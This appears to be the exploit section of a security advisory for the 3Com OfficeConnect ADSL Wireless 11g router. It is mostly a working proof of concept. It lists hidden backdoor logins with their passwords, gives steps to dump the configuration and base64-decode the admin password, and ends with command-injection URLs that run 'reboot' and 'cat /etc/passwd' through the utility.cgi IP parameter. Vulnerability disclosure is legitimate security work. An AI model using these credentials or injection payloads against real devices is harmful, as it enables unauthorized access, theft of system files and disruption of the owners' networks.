• info
• discussion
• exploit
• solution
• references

3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities

Attackers can use readily available tools to exploit these issues.

These example URIs and proof of concept demonstrate the issues:

1) SSH/Telnet to router using one of these hidden accounts:
support:support
user:5
nobody:admin
2) Type 9
3) Type 1
3) Type 3 to dump the configuration
4) Locate the sysPassword field:
<sysPassword value="cXdlcnR5Cg=="/>
5) Decode the admin password:
roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" | base64 -d
qwerty

http://www.example.com/utility.cgi?testType=1&IP=aaa || reboot
http://www.example.com/utility.cgi?testType=1&IP=aaa || cat /etc/passwd